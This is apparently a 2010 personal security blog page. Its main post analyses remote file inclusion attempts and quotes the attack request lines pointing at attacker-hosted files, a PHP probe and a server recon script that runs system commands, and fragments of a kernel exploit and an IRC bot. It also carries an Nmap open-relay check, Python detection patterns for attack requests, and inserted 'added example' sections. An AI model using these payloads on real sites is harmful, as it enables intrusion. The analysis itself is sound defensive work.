myf00

Ideas, projects and thoughts by Duarte Silva

New Area Test
2010
05.14

I started developing for Android a month and a half ago. Developing for Android can be described in two words: simple and smooth. The language is Java, and even though the company where I work mainly develops in Java, I consider it fairly simple to start developing. The IDE is an Eclipse plug-in that, all in all, suits the needs of the developer, and it integrates very well with the ADT (Android Development Tools). Even when running on a 64-bit development machine (the tools are 32-bit), the emulator and ADB (Android Debug Bridge) worked flawlessly. The only criticism I can make is that the emulator stays a little bit on the slow side, at least when compared to a real device.

For that reason, and because a real device can be pickier when it comes to memory, I recommend using a real device from day one.

And by the way, this is my first post from the WordPress Android application ;).

2010
03.07

For about a month I have been tracking the requests made to my site, and looking at the logs I was able to find fourteen attack attempts. The attempts originated from the following IP addresses.

41.204.218.*
58.150.99.*
210.116.103.*

The requests made in the attempts were crafted to test for remote file inclusion (RFI): a parameter that the vulnerable script passes to include() or require() is set to a URL, so PHP fetches the attacker's file and executes it (this needs allow_url_include, or allow_url_fopen on the older PHP versions common at the time).

/contrib/yabbse/poc.php?poc_root_path=http://*******.kr/~eco-max/gboard/lib/id1.txt
/include/admin.lib.inc.php?site_path=http://*******.co.za/content_old/themes/a.txt?

The two files, a.txt and id1.txt, used in the requests boiled down to

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

When included by PHP, the output would contain only FeeLCoMzFeeLCoMz (the die() also stops the rest of the vulnerable page from rendering), which is an easy way for the attacker to verify that the site is vulnerable to remote file inclusion: the scanner only has to look for that marker in the response. The trailing ? on the second URL above is there so that anything the vulnerable script appends to the parameter (a file name such as /config.php, for example) becomes a query string on the attacker's host instead of changing the path to a.txt.

After checking the IP addresses from where the requests originated, I wasn't surprised to find out that they came from the compromised sites that hosted the files. In one of the compromised sites I was able to list the contents of the directory that contained the id1.txt file.

In that directory there were files indicating attempts to exploit local privilege escalation vulnerabilities in Linux (one of them tagged as a 2.6.18 kernel exploit), some Perl scripts that connect to an IRC server (no longer available) in order to receive commands, and two Python scripts.

# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : 2.6.18 2008 Exploit's İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL

#define _GNU_SOURCE
#include <stdio.h>
(...)
#!/usr/bin/perl

print('
########################################
## LoDoyo Scanner Bot v9.1            ##
## By Special Edition By LoDoYo       ##
## ? NOV-Des 2009, NKN - TeaM         ##
########################################
');
######################################################
## Usage:                                           ##
##   perl lodoyocrew.pl <chan w/o #> <server> <port>##
(...)

There were also some text files that are simple logs of the requests made to other sites. Many of the sites I was able to identify in those logs did not host, at least not any more, the files belonging to the id1.txt family. This is a good thing, since it reduces the effectiveness of the attack. Those logs also contained requests made in order to find log files and AWStats report pages.

I picked eight of those requests and was able to download the access logs of five sites. In those access logs I found a lot of requests belonging to the same family as the ones made to myf00.

After hacking up a Python script to go through them, the logs yielded 289199 requests in total, originating from 1612 unique IP addresses: 132 SQL injection attempts, 2082 directory traversals and 251872 remote file inclusion attempts. I could also count 154 hosts that still host files of the id1.txt family.

There are also some web shells in the list, as well as some variations of the id1.txt file family that print some server-related information when invoked in a remote file inclusion scenario (the output tells the attacker the kernel version, the web server user and the current directory before deciding what to do next).

<?
echo "Coracore<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "Coracore is my BoyFriend<br>";
exit;
?>
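The log triage described above, as an added example: this is not the author's script (the post does not reproduce it), and the log lines, IP addresses (RFC 5737 documentation ranges) and host names are constructed placeholders, not data from the post. It parses combined-format access log lines, decodes each request target, labels it as remote file inclusion, directory traversal, SQL injection or benign, and tallies the remote hosts and file names used in the RFI attempts, which is the list of sites still serving id1.txt-family files that the post talks about checking on. The RFI rule is the general one (any query value that is an absolute URL), so it also catches the AWStats configdir form mentioned in the post.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache combined log format. The addresses are
# RFC 5737 documentation ranges and the hosts are placeholders; nothing here
# comes from the author's logs.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Mar/2010:10:12:01 +0000] "GET /contrib/yabbse/poc.php?poc_root_path=http://files.example.net/gboard/lib/id1.txt HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.20 - - [07/Mar/2010:10:13:44 +0000] "GET /include/admin.lib.inc.php?site_path=http://old.example.org/themes/a.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
192.0.2.30 - - [07/Mar/2010:10:15:02 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1034 "-" "Mozilla/4.0"
198.51.100.20 - - [07/Mar/2010:10:16:30 +0000] "GET /news.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 0 "-" "Mozilla/4.0"
192.0.2.5 - - [07/Mar/2010:10:17:00 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.10 - - [07/Mar/2010:10:18:11 +0000] "GET /awstats/awstats.pl?configdir=http://files.example.net/gboard/lib/id1.txt? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)
ABS_URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SQLI_RE = re.compile(
    r"\bunion\s+(?:all\s+)?select\b|'\s*(?:or|and)\b|\b(?:sleep|benchmark)\s*\(|--\s*$",
    re.I,
)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_target(target):
    """Split a request target into its decoded path and decoded query values.
    parse_qsl already percent-decodes once; the extra unquote() also unpacks
    double-encoded payloads, which scanners use to get past naive filters."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    values = [unquote(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return path, values


def classify(target):
    """Label a request target 'rfi', 'traversal', 'sqli' or 'benign'."""
    path, values = decode_target(target)
    # RFI: a parameter value that is itself an absolute URL, i.e. what a
    # vulnerable include($param . "/file.php") would fetch from the attacker.
    if any(ABS_URL_RE.match(v) for v in values):
        return "rfi"
    if any(TRAVERSAL_RE.search(s) for s in [path, *values]):
        return "traversal"
    if any(SQLI_RE.search(v) for v in values):
        return "sqli"
    return "benign"


def rfi_source(target):
    """(host, file name) of the remote file an RFI request points at, or None."""
    for v in decode_target(target)[1]:
        if ABS_URL_RE.match(v):
            u = urlsplit(v)
            return (u.hostname or "").lower(), u.path.rsplit("/", 1)[-1]
    return None


def analyze(log_text):
    """Count requests per category and tally the hosts and files used for RFI,
    which gives the list of sites still serving the id1.txt family to check on."""
    stats, ips, rfi_hosts, rfi_files = Counter(), set(), Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            stats["unparsed"] += 1
            continue
        stats["requests"] += 1
        ips.add(rec["ip"])
        kind = classify(rec["target"])
        stats[kind] += 1
        if kind == "rfi":
            host, fname = rfi_source(rec["target"])
            rfi_hosts[host] += 1
            rfi_files[fname] += 1
    return {
        "stats": dict(stats),
        "unique_ips": len(ips),
        "rfi_hosts": dict(rfi_hosts),
        "rfi_files": dict(rfi_files),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The patterns are deliberately narrow so that the counts stay meaningful; a real scanner feed will also contain encoded variants and noise, which is why the decoding happens before matching rather than the regexes trying to cover every encoding.
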
2010
03.02

My first contribution to the Nmap project was accepted!! It feels good to be able to contribute to such a tool. For more information on the whole process, check out the SecLists.Org mailing list archive here and here. You can check out the script from the Nmap SVN repository or copy the code below.

description = [[
Attempts to relay mail by issuing a predefined combination of SMTP commands. The goal
of this script is to tell if an SMTP server is vulnerable to mail relaying.

An SMTP server that works as an open relay is an email server that does not verify if the
user is authorised to send email from the specified email address. Therefore, users would
be able to send email originating from any third-party email address that they want.

The checks are done based on combinations of MAIL FROM and RCPT TO commands. The list is
hardcoded in the source file. The script will output all the working combinations that the
server allows, or none if the server requires authentication or if there weren't any working
combinations.
]]

---
-- @usage
-- nmap --script smtp-open-relay.nse [--script-args smtp-open-relay.domain=<domain>,smtp-open-relay.ip=<address>] -p 25,465,587 <host>
--
-- @output
-- Host script results:
-- | smtp-open-relay:
-- |   MAIL FROM:<antispam@[10.0.1.2]> -> RCPT TO:<"relaytest@nmap.scanme.org">
-- |   MAIL FROM:<antispam@[10.0.1.2]> -> RCPT TO:<"relaytest%nmap.scanme.org">
-- |_  MAIL FROM:<antispam@[10.0.1.2]> -> RCPT TO:<nmap.scanme.org!relaytest>
--
-- @args smtp-open-relay.domain Define the domain to be used in the anti-spam tests (default is nmap.scanme.org)
-- @args smtp-open-relay.ip Use this to change the IP address to be used (default is the target IP address)
--
-- @changelog
-- 2007-05-16 Arturo 'Buanzo' Busleiman <buanzo@buanzo.com.ar>
--   + Added some strings to return in different places
--   * Changed "HELO www.[ourdomain]" to "EHLO [ourdomain]"
--   * Fixed some API differences
--   * The "ourdomain" variable's contents are used instead of hardcoded "insecure.org". Settable by the user.
--   * Fixed tags -> categories (reported by Jason DePriest to nmap-dev)
-- 2009-09-20 Duarte Silva <duarte.silva@myf00.net>
--   * Rewrote the script
--   + Added documentation and some more comments
--   + Parameter to define the domain to be used instead of "ourdomain" variable
--   + Parameter to define the IP address to be used instead of the target IP address
--   * Script now detects servers that enforce authentication
--   * Changed script categories from demo to discovery and intrusive
--   * Renamed "spamtest" strings to "antispam"
-- 2010-02-20 Duarte Silva <duarte.silva@myf00.net>
--   * Renamed script parameters to follow the new naming convention
--   * Fixed problem with broken connections
--   * Changed script output to show all the successful tests
--   * Changed from string concatenation to string formatting
--   + External category
--   + Now the script will issue the QUIT message as specified in the SMTP RFC
-- 2010-02-27 Duarte Silva <duarte.silva@myf00.net>
--   + More information in the script description
--   + Script will output the reason for failed commands (at the connection level)
--   * If some combinations were already found before an error, the script will report them
-----------------------------------------------------------------------

author = "Arturo 'Buanzo' Busleiman <buanzo@buanzo.com.ar>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery","intrusive","external"}

require "shortport"
require "comm"
require "stdnse"

portrule = shortport.port_or_service({ 25, 465, 587 }, { "smtp", "smtps", "submission" })

---Send a command and read the response (this function does exception handling, and if an
-- exception occurs, it will close the socket).
--
--@param socket Socket used to send the command
--@param request Command to be sent
--@return False in case of failure
--@return True and the response in case of success
function dorequest(socket, request)
	-- Exception handler
	local catch = function()
		socket:close()
	end
	-- Try function
	local try = nmap.new_try(catch)

	-- Lets send the command
	try(socket:send(request))
	-- Receive server response
	local status, response = socket:receive_lines(1)

	if not status then
		local messages = {
			["EOF"] = "connection closed",
			["TIMEOUT"] = "connection timeout",
			["ERROR"] = "failed to receive data"
		}

		return false, (messages[response] or "unspecified error, for more information use --script-trace")
	end

	return true, response
end

function go(host, port)
	local domain = "nmap.scanme.org"
	local ip = host.ip
	local socket = nmap.new_socket()
	local options = {
		timeout = 10000,
		recv_before = true
	}

	socket:set_timeout(5000)

	-- Be polite and when everything works out send the QUIT message.
	local quit = function()
		dorequest(socket, "QUIT\r\n")
		socket:close()
	end

	-- Use the user provided options.
	if (nmap.registry.args["smtp-open-relay.domain"] ~= nil) then
		domain = nmap.registry.args["smtp-open-relay.domain"]
	end

	if (nmap.registry.args["smtp-open-relay.ip"] ~= nil) then
		ip = nmap.registry.args["smtp-open-relay.ip"]
	end

	-- Try to connect to server.
	local response

	socket, response = comm.tryssl(host, port, string.format("EHLO %s\r\n", domain), options)

	if not socket then
		return false, string.format("Couldn't establish connection on port %i", port.number)
	end

	-- Close socket and return if EHLO command failed
	if not string.match(response, "^250") then
		quit()
		return false, "Failed to issue EHLO command"
	end

	-- Find out server name.
	local srvname = string.sub(response, string.find(response, '([.%w]+)', 4))

	-- Antispam tests.
	local tests = {
		{ from = "MAIL FROM:<>", to = string.format("RCPT TO:<relaytest@%s>", domain) },
		{ from = string.format("MAIL FROM:<antispam@%s>", domain), to = string.format("RCPT TO:<relaytest@%s>", domain) },
		{ from = string.format("MAIL FROM:<antispam@%s>", srvname), to = string.format("RCPT TO:<relaytest@%s>", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest@%s>", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest%%%s@[%s]>", domain, ip) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest%%%s@%s>", domain, srvname) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<\"relaytest@%s\">", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<\"relaytest%%%s\">", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest@%s@[%s]>", domain, ip) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<\"relaytest@%s\"@[%s]>", domain, ip) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<relaytest@%s@%s>", domain, srvname) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<@[%s]:relaytest@%s>", ip, domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<@%s:relaytest@%s>", srvname, domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<%s!relaytest>", domain) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<%s!relaytest@[%s]>", domain, ip) },
		{ from = string.format("MAIL FROM:<antispam@[%s]>", ip), to = string.format("RCPT TO:<%s!relaytest@%s>", domain, srvname) },
	}

	local result = {}
	local index
	local status

	-- This function is used when something goes wrong with the connection. It makes sure that
	-- if it found working combinations before the error occurred, they will be returned.
	local failure = function(message)
		if #result > 0 then
			return true, result
		else
			return false, message
		end
	end

	for index = 1, #tests do
		status, response = dorequest(socket, "RSET\r\n")

		if not status then
			return failure(string.format("Failed to issue RSET command (%s)", response))
		end

		-- If resetting the envelope doesn't work for one test, it won't work for the others (critical command).
		if not string.match(response, "^250") then
			quit()
			-- Check if server needs authentication.
			if string.match(response, "^530") then
				return false, "Server isn't an open relay, authentication needed"
			else
				return false, "Unable to clear server envelope"
			end
		end

		-- Lets try to issue MAIL FROM command.
		status, response = dorequest(socket, string.format("%s\r\n", tests[index]["from"]))

		-- If this command fails to be sent, then something went wrong with the connection.
		if not status then
			return failure(string.format("Failed to issue %s command (%s)", tests[index]["from"], response))
		end

		-- If MAIL FROM failed, check if authentication is needed because all the other attempts will fail
		-- and server may disconnect because of too many commands issued without authentication.
		if string.match(response, "^530") then
			quit()
			return false, "Server isn't an open relay, authentication needed"
		-- The command was accepted (otherwise, the script will step to the next test).
		elseif string.match(response, "^250") then
			-- Lets try to actually relay.
			status, response = dorequest(socket, string.format("%s\r\n", tests[index]["to"]))

			if not status then
				return failure(string.format("Failed to issue %s command (%s)", tests[index]["to"], response))
			end

			if string.match(response, "^530") then
				quit()
				return false, "Server isn't an open relay, authentication needed"
			elseif string.match(response, "^250") then
				-- Save the working from and to combination.
				table.insert(result, string.format("%s -> %s", tests[index]["from"], tests[index]["to"]))
			end
		end
	end

	quit()
	return true, result
end

action = function(host, port)
	local status, result = go(host, port)

	-- No combinations found
	if #result == 0 then
		return stdnse.format_output(false, "All tests failed, server doesn't seem to be an open relay")
	end

	return stdnse.format_output(status, result)
end
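The exchange the script performs, as an added example in Python rather than NSE (this is not the Nmap script's code): a small probe that sends EHLO, then RSET / MAIL FROM / RCPT TO for a subset of the script's address forms (the percent hack, quoted local part, source route and bang path) and treats a 530 as "authentication required" exactly as the script does, run against a fake in-process SMTP server whose relay policy is an assumption of this example ('open' accepts any recipient, 'closed' only delivers to its own domain and 'auth' answers 530). The domain mail.example.test, the placeholder hosts and the reply texts are assumed values, not from the page.

```python
import smtplib
import socketserver
import threading

LOCAL_DOMAIN = "mail.example.test"  # the fake server's own domain (assumed)


class FakeSmtpHandler(socketserver.StreamRequestHandler):
    """Just enough SMTP to answer the probe. server.policy is 'open' (relays
    anything), 'closed' (local mailboxes only) or 'auth' (answers 530)."""

    def reply(self, text):
        self.wfile.write((text + "\r\n").encode())

    def handle(self):
        self.reply(f"220 {LOCAL_DOMAIN} ESMTP fake")
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "EHLO":
                self.reply(f"250-{LOCAL_DOMAIN}")
                self.reply("250 PIPELINING")
            elif verb in ("MAIL", "RSET"):
                self.reply("250 2.0.0 OK")
            elif verb == "RCPT":
                self.reply(self.rcpt_decision(arg))
            elif verb == "QUIT":
                self.reply("221 2.0.0 Bye")
                return
            else:
                self.reply("500 5.5.1 Command unrecognized")

    def rcpt_decision(self, arg):
        if self.server.policy == "auth":
            return "530 5.7.0 Authentication required"
        if self.server.policy == "open":
            return "250 2.1.5 OK"
        # 'closed': deliver only to a plain mailbox in our own domain; source
        # routes, the % hack, bang paths and quoted local parts are refused.
        addr = arg.split(":", 1)[-1].strip().strip("<>")
        local = addr.lower().endswith("@" + LOCAL_DOMAIN)
        plain = addr.count("@") == 1 and not any(c in addr for c in '%!"')
        return "250 2.1.5 OK" if local and plain else "554 5.7.1 Relay access denied"


def relay_tests(domain, ip, srvname):
    """A subset of the MAIL FROM / RCPT TO forms the NSE script tries."""
    frm = f"<antispam@[{ip}]>"
    return [
        ("<>", f"<relaytest@{domain}>"),
        (f"<antispam@{domain}>", f"<relaytest@{domain}>"),
        (frm, f"<relaytest@{domain}>"),
        (frm, f"<relaytest%{domain}@[{ip}]>"),
        (frm, f"<relaytest%{domain}@{srvname}>"),
        (frm, f'<"relaytest@{domain}">'),
        (frm, f"<@[{ip}]:relaytest@{domain}>"),
        (frm, f"<{domain}!relaytest>"),
    ]


def probe_open_relay(host, port, domain="nmap.scanme.org", ip=None):
    """('auth', []) if the server answers 530, else ('done', accepted pairs)."""
    ip = ip or host
    working = []
    # local_hostname stops smtplib from resolving our own host name first.
    with smtplib.SMTP(host, port, local_hostname=domain, timeout=5) as conn:
        code, msg = conn.ehlo(domain)
        if code != 250:
            return ("error", working)
        srvname = msg.decode(errors="replace").split("\n", 1)[0].split()[0]
        for frm, to in relay_tests(domain, ip, srvname):
            conn.docmd("RSET")  # clear the envelope between tests
            code, _ = conn.docmd("MAIL", "FROM:" + frm)
            if code == 530:
                return ("auth", working)
            if code != 250:
                continue
            code, _ = conn.docmd("RCPT", "TO:" + to)
            if code == 530:
                return ("auth", working)
            if code == 250:
                working.append(f"MAIL FROM:{frm} -> RCPT TO:{to}")
    return ("done", working)  # the context manager sent QUIT on exit


def run_against_fake(policy):
    """Start the fake server on the loopback with the given policy and probe it."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSmtpHandler)
    server.daemon_threads = True
    server.policy = policy  # read by FakeSmtpHandler.rcpt_decision
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe_open_relay("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()
```

run_against_fake("open") returns all eight combinations, "closed" returns none and "auth" returns the 530 status after the first RCPT TO; probe_open_relay can equally be pointed at a real host and port. Note that, like the script, the probe only looks at the reply to RCPT TO and never sends DATA, so a server that accepts recipients at the envelope stage but bounces later will still be reported as relaying.
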
2010
02.27

I’m a *fan boy*, a Honda *fan boy*. I can only describe the small Honda sport compact vehicles from 1995 to 1998 with one word: magic. Why is that? The feel of driving one is amazing, it’s like you are connected to the car. You feel the gears engaging, the clutch grabbing the flywheel and the throttle cable opening the plate; it’s that mechanical feeling that I can’t find in any other modern car in the same segment as those *little* magic cars.

The one I drove was a Honda Civic 1.6 ESi. In its original form it is powered by a single-sided VTEC SOHC that pushes 125 ponies. For the owner it wasn’t enough though, so he decided to transplant the engine from the Honda Civic 1.6 VTI. Now with DOHC and true VTEC the car gained a new life. But the feeling, that mechanical feeling, was still there. Actually, it was only intensified by its new 160hp engine.

Many will argue that the torque is low, and it’s true, seriously, it sucks. But with a good driver who knows how to keep the engine revolutions in the sky (8000rpm red-line, eheheh) the car simply flies. Sticking to the road thanks to its double wishbone suspension, it handles curves like it was on rails.

Did I drive it like a maniac? No way in hell!!! I was so afraid of something happening to the car that even the owner was telling me to go faster!

And what about now? I look at the new Honda compact cars and I can’t actually call them sporty, even those that are supposed to be. Using cheaper suspensions and less emotional engines, I simply feel like Honda has lost its spirit, its racing spirit, that made Honda what it was some ten years ago. My ecologist side tells me that this is the way to go, with the econoboxes and their drive-by-wire systems. But my petrol head side tells me to hell with that, I want emotion and feelings of satisfaction, driving satisfaction.

I’m human, and I’m bound to emotions by nature, and that is why I don’t see myself buying a Honda vehicle any time soon, at least not like I did back in the day.

I also need to say thanks to Francisco aka ChlcO, for giving me the chance to taste what Honda should be all about! Fly high my friend!

2010
02.24

Just wanted to quote the following paragraph from Mika Tolvanen’s blog post on the F-Secure Weblog.

Today’s browser is more powerful than yesterday’s OS.

The browser is, for all practical purposes, a terminal of the bank, but it is running in a completely untrusted environment. Actually, you could say that the Browser is the new OS. Since important content is more and more in the cloud and accessed via the browser, malware, in theory, does not have to infect the OS at all. Malware only needs to infect the browser and it will be able to access, steal, and modify all the necessary content. Since most browsers have a cross-platform plugin architecture, it may even be possible to create data stealing malware that is not interested in the operating system or file system at all. It will only exist in memory of the browser.

This is totally my point of view on browsers in terms of security, and it is what I tried to prove with my Firefox malware PoC. Browsers really need to step up their game.

FFSpy Logger